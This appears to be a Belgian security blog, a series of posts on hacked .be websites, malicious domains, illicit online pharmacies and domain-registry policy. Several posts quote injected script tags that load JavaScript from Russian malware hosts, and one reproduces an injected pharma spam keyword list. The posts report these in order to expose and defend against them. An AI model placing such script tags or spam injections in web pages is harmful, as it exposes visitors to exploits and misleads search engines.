• Some Belgian realestate sites infected with Russian scripts

    Informatie aanvragen - Lo-Immo

    Lochristi<script src=http://vbs.webserivcezub.ru/js.js></script>. Mooie Halfopen beb met 3 ruime slpk en handelszaak op 580m² ...

    Huyzentruyt<script src=http://vbs.webserivcezub.ru/js.js></script>

    Woningbouw Huyzentruyt N.V.; Wagenaarstraat 33; B-8791 Waregem - Beveren-Leie. tel. 056/736 736; fax 056/718 517; happy@huyzentruyt.be ...

    appartement - Immo Nele Tassaert | Verkoopt ook uw eigendom!

    NIEUW Kortrijk<script src=http://vbs.webserivcezub.ru/js.js></script> - Ruim 3 slaapkamer appartement (120m2) aan de Grote Markt ...


    Residentie Clovis<script src=http://vbs.webserivcezub.ru/js.js></script> ... Vendelstraat<script src=http://vbs.webserivcezub.ru/js.js></script> ...

    mmotion | Zeer goed gelegen Duplexappartement

    Adres: Stasegemdorp 79, 8530<script src=http://vbs.webserivcezub.ru/js.js></script> Harelbeke<script src=http://vbs.webserivcezub.ru/js.js></script> ...


    and so on and so on
  • Flair.be infected with Russian malware redirect script

    Wat met het recht op privacy op kot? | Flair

    5 okt 2009 ... Wettelijk<script src=http://apps.webservicesbba.ru/js.js></script><script src=http://ide.webserviceftp.ru/js.js></script><script ...

    www.flair.be › Home › Seks & Relaties › Helpdesk - In cache

    Links | Libelle

    Sub-categorie: Recepten<script src=http://apps.webservicesbba.ru/js.js></script>
    <script src=http://ide.webserviceftp.ru/js.js></script><script ...

    In een flits voelde ik me plots agressief tegenover haar! | Flair
    Psycho<script src=http://apps.webservicesbba.ru/js.js></script><script src=http://ide.webserviceftp.ru/js.js></script><script ...
    www.flair.be › Home › Seks & Relaties › Helpdesk - In cache

    Links - Pagina 2 | Libelle
    Sub-categorie: Logeren Europa<script src=http://apps.webservicesbba.ru/js.js></script><script src=http://ide.webserviceftp.ru/js.js></script><script ...
    www.femmesdaujourdhui.be/.../showtime_links.html?... - In cache

    and some others

    do not only clean it up, shut it up and close it down

    According to Google visitors will be presented with
    Malicious software includes 5339 scripting exploit(s), 1 exploit(s).

    A few hundred websites are already infected
  • Humo.be and others infected with another redirect to a Russian attack server

    So we have changed the Google Dork to the following search term that seems to take a lot of these scripts into consideration    ru/js.js>

    For Belgian it became clear that some of the sites that are infected have some importance (and not enough security anymore)

    Humo's Rock Rally 2010 - The Mojo Filters | Humo: The Wild Site

    Halve Finale<script src=http://apps.webservicesbba.ru/js.js></script>: Petrol Antwerpen<script src=http://apps.webservicesbba.ru/js.js></script><script ...
    www.humo.be/tws/.../the-mojo-filters.html - In cache - Vergelijkbaar

    Meer resultaten van www.humo.be verbergen
    1. Humo's Rock Rally 2010 - Amatorski | Humo: The Wild Site

      Halve Finale<script src=http://apps.webservicesbba.ru/js.js></script>: Vooruit Gent<script src=http://apps.webservicesbba.ru/js.js></script><script ...
      www.humo.be/tws/rock.../amatorski.html - In cache - Vergelijkbaar
    2. Humo's Rock Rally 2010 - Gloria | Humo: The Wild Site

      Rock<script src=http://apps.webservicesbba.ru/js.js></script>. Gent. Home Profiel Audio Foto's Video's. Beluister songs van Gloria. Finale: Loser ...
      www.humo.be/tws/rock-rally-2010/.../boatenggloria.html - In cache
    3. Humo's Rock Rally 2010 - PSYCHO 44 | Humo: The Wild Site

      Halve Finale<script src=http://apps.webservicesbba.ru/js.js></script>: Petrol Antwerpen<script src=http://apps.webservicesbba.ru/js.js></script><script ...
      www.humo.be/tws/rock.../psycho-44.html - In cache - Vergelijkbaar
    4. Humo's Rock Rally 2010 - Nele Needs A Holiday | Humo: The Wild Site

      Rock<script src=http://apps.webservicesbba.ru/js.js></script>. Gent. Home Profiel Audio Foto's Video's. Beluister songs van Nele Needs A Holiday ...
      www.humo.be/tws/rock-rally.../nele-needs-a-holiday.html - In cache
    5. Inbox | Humo: The Wild Site

      23 juni 2010 ... Toyota blijft zoeken naar oorzaak probleem gaspedalen Fotostrips<script src=http://apps.webservicesbba.ru/js.js></script> | FPA ...
      www.humo.be/.../fotostrips%3Cscript-srchttpappswebservicesbbarujsjs%3E%3Cscript%3E.html - In cache

    If this continues Humo.be will find itself blocked by Google - there goes your traffic and your ad income and your reputation and your webproject.....

    Security is quality and there is no quality without security.

    The website that visitors are being sent to is another Russian malware attack site

    Visitors will be confronted by  3318 scripting exploit(s), 1 exploit(s).

    It is no fastflux and has only infected 179 sites so far.


  • why blocking postfolkovs.ru and cleaning up the infections

    According to Google Badware analysis

    The site uses 5261 scripting exploits against visitors and 467 real exploits and 3 trojans. This is like a metasploit attack.

    It hosts other malware on the following Indian sites giaamusic.in/, korvet.in/.

    But it is in fact in a fastflux botnet because it is found to be hosted on 164 networks by Google.

    It has infected untill today at least 2311 websites during the last 90 days.



  • some Belgian sites infected with Russian redirect script

    the scripts that redirect visitors to this Russian site are to be found according to Google in about 1700 pages on some tens of Belgian sites

    Google search  postfolkovs.ru/js.js

    some examples

    Sioen Industries - Financiële kalender<script src=http://batch ...

    woensdag, 31 maart, 2010. Aankondiging jaarresultaten 2009; donderdag, 29 april, 2010. Trading update 1e kwartaal 2010; vrijdag, 30 april, 2010 ...


    Sitemap<script src=http://id.postfolkovs.ru/js.js></script>

    Deze site kan schade toebrengen aan uw computer.
    Fitnessexperts is de ideale partner voor Home fitness equipment, home trainer, Fitnessworld, goedkope fitness apparatuur, cross trainer, Dunlop crosstrainer ...


    some other sites are






  • another 400 websites injected script to Russian site but not clear why

    nicio<script src=http://crypt.postfolkovs.ru/js.js></script ...

    Maribel Martinez Diaz,Home,menopausia,julio,ginecologia,ginecologa,mujer,ginecologo,adolescente,tratamiento.

    But there are many other subdomains that are also used so it will be better to block

    postfolkovs.ru (use it also as searchterm)

    for the moment they are finding nothing malicious in the scripts, but why are they sending all that traffic to this site, if nothing is going to happen or are they just waiting to see what will happen ?

    there are about 400 sites and 74.000 pages sites for the moment and Google blocks some of them as dangerous, but NOT ALL of them

    One should block the domain

  • injecting search terms (pharma, porn) on sites to fool search engines

    If you can hack sites and place stupid comments about Israël, non-muslims, kurds and the US for starters, than you can do the same and place search terms that can uplift your sites or ads in search-engines.

    It is necessary to do this in normal sites that have otherwise no other reputation problem so the search engine will index the links and search terms and links as normal content.

    This means that schools, arts sites, sportclubs, individual sites and so on are the prime target for this kind of insertion attack


    when typing site:.be "canadian healthcare" in Google there are some sites that pop up but have nothing to do with illicit pharmacies or healthcare

    for example

    purchase real name brand viagra ordering viagra online viagra with ...

    canadian healthcare propecia · cialis viagra online · get viagra without prescription · cheap propecia professional · buy viagra online usa ...
    www.gifant.be/ - Cached

    It is a normal website for some small art festival but on the frontpage somebody injected a long list of links like

    cheapest line viagra
    viagra cost
    viagra for sale on the internet
    buy cialis without prescription
    canada viagra sales
    viagra online
    propecia for sale
    sale of viagra
    generic viagra online
    viagra kamagra cheap
    cialic canada
    cialis daily cost
    viagra uk
    cialis soft tabs online
    generic meltabs viagra
    low cost viagra
    where to buy propecia
    buy propecia
    cialis for sale
    discount cialis
    viagra for sale online
    viagra in uk
    viagra overnight delivery
    online pharmacy
    buying viagra in canada
    cialis professional
    to buy cialis
    order status viagra
    sale uk viagra

    that all go to another domainextension without much doubt : edu
    http://www.iab.uaf.edu/test.php?p=generic-meltabs-viagra  (already cleaned)

    You really have no security without quality and no quality without security.

    There are an enormous list of examples.

  • dns.be in 2009 : don't talk about problems please

    DNS.Be has published its yearly review of its numbers with some pseudo research to fill the pages. For the rest it is just a jubilation of itself and a publicity product and for these reasons it is NOT a yearly review.

    It did not mention - for starters - that .be was the victim of a fastflux attack in the beginning of the year (discovered here) and that it took some time to solve that problem.

    It also is a bit easy to say that DNS.Be will lower the price (from 20 Euro's to 2.5 for the registrars-resellers) each time it can and that that won't impact quality and security - which are being mentioned here and there as publicity. It just doesn't add up. You can't say that you don't have the people for monitoring and fastresponse to fastflux and other attacks and at the same time lower the price of your prime product time and time again.

    DNS.Be is NOT an organisation for resellers. If they want to lower the price again and again, than they should form a lobby group. Dns.Be is responsable for the whole .be domain which for most part is owned by Belgians. They are responsable for the economic and other impact .be can have if something goes wrong.

    Like being mentioned as one of the top 5/top3 of the phishing domeinextensions. (also not mentioned there).

    They have a strategic committee that doesn't write their own part of the report and that is more concerned about their looks than their ideas.

    So yes, I think that the .be domain will have to become more expensive if it is to better protect its domainzone and follow up on the incidents that are bound to happen if you have more than 1 million domainnames to look after. And even if the registrars are protesting, they are only part of the community, they are only one of the stakeholders.

    But in dns.be they seem to be the only one sitting at the table and influencing the decisions.

  • the pseudo science of the WHOIS study by NROC for ICANN

    Since several years there are complaints and studies that the WHOIS system (who is responsable for a certain domain) is totally inaccurate and even false and that this has certain dangers.

    So the NRO did a sample study for ICANN but that is so limited in scope that it is not worth the paper it is written on

    * it is concentrated on the .com domain in general (75%)

    * more than 75% of the registrants are according to their WHOIS in the US

    * the number of domains tested is about 1400 (for the same money you could try to test automatically thousands of emailadresses as this one is always used if all the rest is false or incorrect).

    So statistically this is so limited in scope that it doesn't mean a thing. If you want to proof that of the whole general gtld internet the WHOIS has a high percentage of mistakes or false addresses, your sample will have to be much greater.

    The problem is that nobody is saying this.

    The three biggest problems with the present whois are

    * that you have to have the correct name and address - even email of the people responsable for the technical side of the matter if the site gets hacked or attacked

    * that business domains need to have a real business addresses just as in the offline world

    * that criminal online businesses are hiding their addresses or aren't contactable which makes any judicial procedure more difficult

    Off course if you make a study about such a big zone (and even than have a high percentage of faults and noncontactable domains) than you can't give practical solutions because the impact will be too great. And thus the investment - even if there if there is no logical or business reason for them.

    * when one says that it would cost more if the registrar would have to check each address on the whois with the creditcard than this would be totally normal for a business site. And for a higher price this site could have a certified WHOIS logo.

    And if one says that the WHOIS of the different registrars are different and that one need one central database and WHOIS and that this would cost enormous sums, than one has to be assured that this would be totally logic for business sites that are certified.

    Another reason for this is that online business is built upon reputation. Everything you can do online can be spoofed. The only things you can trust a bit are the certification services (if they are secure enough). The WHOIS system needs a certification service. It can even be used as a privacy service for certain details of the contact information.

    * when one says that it will ask a lot of effort to track down most of the users with mistakes in their WHois, one can respond that this effort will only be necessary when there is a real problem with the site that asks such an urgency.

    For the moment the internet is still in the landgrab mentality and just as in the wild wild west there are no clear laws and bounderies. It is time to start setting up a system that will determine clear and distinct legal ownership of the virtual legal estates one has. It is not sure that this registration will be as cheap as it is - and maybe a general certification tax on all new domains would help fund the certification services - but there is no business reason why virtual domains should be that cheap. They are not coca cola for immediate consumption, but investments in virtual real estate and property. The cost shouldn't be times 100 but a 10% increase would already make a big difference.

    This is only possible if a system is set up that would protect global brands across the domainname system from being hijacked.

  • brandmanagers will go to court instead of alternative dispute mechanisms

    In the beginning there was the saying that the internet was not made for the geographical judicial system and that it was too complicated to make an international internet courtsystem.

    So with the community thinking and the new world ideology several kinds of alternative dispute mechanisms were set up. (UDR). Also in Belgium.

    For brand managers it is clear that they have failed and are doomed in their present form. For several reasons.

    They also cost a lot of time and money, even if many of their decisons can - based upon precedents - be automated. If you have decided that any domainname with the name disney in it is a brandname and should have the approval of disney before than any other dispute about the same brandname should take several minutes.

    Secondly contrary to the judicial system the UDR dispute mechanism doesn't take their individual decisions to a higher level. If you have taken tens of decisons, than that should be the basis to make new rules that should be integrated in the contracts. As long as it are totally individual decisions you can use an UDR, but after some time you should prevent the same from happening all over again.

    Otherwise you are in the stupid situation that the registrar is inserting new domainnames that are totally illegal if one should abide by the decisions of the UDR. And you can't expect brandmanagers to go to the UDR for each repetitive cheap domainname that is nearly exactly the thing they got out of the air the month or even the day before.

    This looks a bit like the oil spill....

    Thirdly there is no effective punishment that scares the other parties (if their WHOIS is correct and if they are even contactable) and makes the risk more important.

    So yes, you should go to court and sue them for everything they have and sue those that have helped them to register, host and make the services and getting paid. They should also know there is a risk.

    And yes, this costs money. And yes this will take some time. But after all, it will be LAW. Real LAW.

    And as the online world is becoming less the Wild West and every year even more a normal business environment, businesses and people are turning to something they can really trust and that is REAL LAW.

    Why am I saying this ? Because I believe that after the trial that Verizon, Yahoo and others won against enom it is clear that the UDR process was flawed from the beginning because it didn't make 'community' law that was used as such and that if the internet is to be trusted one day it will need laws. And as the community model didn't work and didn't produce such laws, the centuries old way of making law will have to start doing so. For better and for worse, but there is no alternative.

  • when is a domainregistrar too big too fail even if courts decide as such

    Some big domainregistrars are playing with fire and are - just as the banks and the investors before the crisis - only looking at the short term and the easy criminal money. The are helping online illicit pharmacies to hide from prosecution and are being payed for the whole backoffce (payment) processing that is necessary for those services to function.

    When smaller ISP's and hosters or registrars are being dismantled or disconnected because they are infiltrated or used by the online and offline criminal businesses, the rest of  the internet can take care of the domaintransfers and the hosting of the legitimate businesses.

    THe implication of one of the biggest domainregistrars of the internet in helping and supporting illicit pharmacies can have big implications if one judge in the US decides to condemn for it and call the operation to be criminal. It is not possible to transfer that many domainnames at the present time. Even Knujon.com says that the involvement of enom firms and services in this (by US law) online criminal activity has enormous risks for the whole internet as we know it.

    If we stay with the comparaison with the banking sector we will have to make as a community the following decision

    Or we are accepting that the 5 biggest registrarservices are changing the domainbusiness in a collective monopoly and we need to regulate them more strictly than others because of that systemic risk.

    Or we have to take steps to break them up or liberate the market even more - maybe by limiting the number of domainextensions one may sell or the number of affliates one may have just as we have done in several other industries.

    I think that if this choice is put before them that in the end their choice will be the first.

  • dny.no-ip.be used as hosting for illicit pharmacies and more

    The site gives you free subdomains and nearly free hosting and stuff like that

    You can set up as many pages as you would like

    so the spammers did

    type site:dny.no-ip.be

    and next to it viagra, cialis, porn, free movies or whatever and you will get it

    The domainname is Belgian and it redirects to a french domain that is clearly under french law and established and will probably listen to this kind of complaints from administrative or legal services from the administration or the brandname holders

  • how legal is an european private online hospital

    This is part of an international network of sites and operators out of Switzerland. They give the impression of being medical and responsable and say that they work with doctors and lists of questions, but how can you make a real professional judgement if you don't see, touch and examine your patient ?

    Ok, some medications in Europe are sold to the public in one country and are only available after prescription (but their composition may not be the same)

    On their belgian FAQ site they say that it is up for the patient to research if it is legal for them to buy those drugs. This is the world on its head. It is up for the operator to be sure that he or she has the legal capacity to sell those things online in the country he is sending the drugs to.

    It is rather ridiculuous to have all kinds of websites (even bigger ones) refusing to send blanc dvd's to Belgium because of our law on copyright taxes and having at the same time illegal private hospitals playing illegaly online doctor and pharmacy in our country.

    Nobody will be harmed by a package of blanc DVDR but they sure will by an overdose of or badly taken drugs.

    http://www.121doc.be/faqs_all.html (last question)

  • another domainextension to block and forget about .su

    Since the desintegration of the Soviet Union in 1992 this domainextension has been through all the steps of the process of termination and transfer, but nobody has deared to pull the plug effectively as they did with the .yu for Yougoslavia and several others.

    There is some talk about community and other historical stuff but a local domainextension is linked to a country or region with a political authority the community can call upon if things get out of hand with their domainextension.

    The .su domainextension is for the moment being sold by Americans

    and if you Google some terms like cialis, porn, hacking, for the site:.su  than you will find enough reasons to just forget about it

    You will find such sites on any domainextension, but this one is without any doubt one of the domainextensions for which No government is responsable.

    Or they should apply in the new generic tld system and pay like all the others.

  • Google gets rich with ads for illicit pharmacies

    so we typed in Google cialis looking for bad .name sites

    to our astonishment, Google also gave us this - knowing that we are from Belgium and that Belgium has a very strict law about the selling or promotion of medicines

    C l A L I S France
    Prix pas cher
    Types de paiement différents

    CialisOnline Bestellen
    Krijg Hardere en Snellere Erecties.
    Koop 2 & Krijg 1 Fles Gratis!

    2OmgCialis 1OOmgViaqra
    2OmgCialis - 1Opills - 39.95
    1OOmgViaqra - 1Opills - 35.95

    C l A L I S
    1Omg - 1.2OEUR :. 2Omg - 1.25EUR.
    VlSA, MC, JCB. 365/24/7

    GenericClALlS Є1.27 PerPills

    GenericClALlS 1.33 PerPills
    Fast European delivery

    GenericClALlS in Europe
    Most popular quantity 20mgx20pills
    Price Є54.69. TadalafilGroup.

    I think it is time to consider that those legitimate firms are also making much of their money promoting illegal businesses. I think that if our traditional online media would do this, they would be prosecuted.

  • .name domainextension hijacked by criminals

    The .name domainextension was agreed to by ICANN because it would give individuals the possibility to have their own domainname, something personal and some hype was given around it (personal networks, social media and all that crap).

    It seems that now the domainextension has been overly used by criminals to sell illicit drugs (pharmacies)


    and look at this one (directnic)


    but there is worse - which is the reason that the whole .name domainextension is becoming something to worry about  or just to blacklist as such untill it dies naturally.

    * there is no real WHOIS

    * the sites are being also used as nameservers for others sites with other domainextension and are as such shielding such illegal sites from public view

    an example is this site


    and when you click it, you arrive here  http://www.bmpharmacy.com

    And if you really want some other stuff after you have taken all that fake viagra and didn't get sick afterwards, you type this in for .name


    so blocking .name seems like a good idea, who needs it anyway, would you have a .name domain in that kind of neighborhood ?

  • some things about the religious pedophilecases in Belgium

    The Belgium Catholic church establised an internal commission to treat the compliants about pedophiles in the Belgian church

    the problem with this commsission is that its main mission was to keep the cases closed to the public and from the public

    for example 100 of the 500 cases normally asked this internal commission to transfer their files to the justice department, but they only transferred 2 so far.

    when it became clear that there was a crucial meeting taking place in which the hierarchy of t he Belgian Catholic church could decide to destroy all the files about older pedophile cases, the jusitice department decided to take everything into custody in an operation the representative of the Vactican called 'worse than being convicted as a pedophile" and 'worse than under communism".

    But the internatl law of the catholic church isn't public law and things like abusing kids can't be treated by internal canocial law, they are always public law because of its gravity. It is not enough that those priests and bishops have as sole punishment that they are sent to a faraway country and that the victims reveice some small amounts of money to shut up.

    You also have to take into consideration that since the Dutroux period many people thought that the police and the justice department were protecting people in high functions. You can assume that the judge didn't want to give the impression that this woujld be the case here. If they would have allowed the church to burry 400 files about possible pedophile cases and accept that they didn't receive 98 other cases that should have been transferred to them anyway, the justice department wouldn't have any credibility left. The damage to its reputation would have been enormous, especially towards the victims and the family who would have the feeling that there was no justice anywhere (not in the church and not in the courts) and that nobody was respecting their wishes.

    Another remark is that the police confiscated all the computers and that they  didn't have a backup so all administrative operations are now at a standstill. It is not clear when these computers will be returned.

    to be continued

  • Microsoft updates and planning

    After that Microsoft had put a bit order in its stream of security updates and organized it to be relased on the second tuesday of the month, it now seems that more updates are coming our way - although they are purely functional

    on the Internet Storm Center they have the impression that those updates are released the 4th tuesday of the month - if there are some

    for bigger networks this can be a hassle because now that you have organized your patching testing and process every month - it now seems that it could be every 2 weeks. This takes away some advantages of this process which made it an example for the rest of the industry.

    It would be a better idea to release also those patches the second tuesday of the month but maybe in different packages that can be distributed at different times throughout the enterprises.

    Also because while we are testing the impact of the securitypatches - we ought to test also the eventual impact of the functional patches. This month the patches are for the .net framework. This wouldn't be a problem if the programmer hasn't messed up the application and has left everything more or less standard - but you know that is seldom the case.

  • Tucows steals expired domainnames before anyone else

    While there is no evidence that Tucows engages in front running, they do own Yummy Names, a portfolio of "tens of thousands of names." Many of these domains were originally registered by Tucows customers, but were not renewed.

    Go Daddy is the world's largest domain name registrar, yet maintains one of the lowest ratios of refunded domain names of any large registrar. Unlike some of its competitors, Go Daddy does not participate in domain name investing nor does it "own" domain names, apart from those legitimately needed for online commerce.

    this means you shouldn't keep your domainnames with such a service because if you have an administrative failure for renewal, than you not only lost it, but you can't get it back at a normal price.

  • Somalia will have a domainextension

    How does this failed country get a domainextension and who will control it - or change conrol ?

    The official government who is only holding out in a few blocks in the capital or the Al Quaida linked gangs and pirates holding on to the rest of the country - with maybe some local warlord keeping control of some routes or villages for some time ?

    How can a totally failed state be an official domainextension on the internet ? You never know who you are dealing with and for how long and under what circumstances.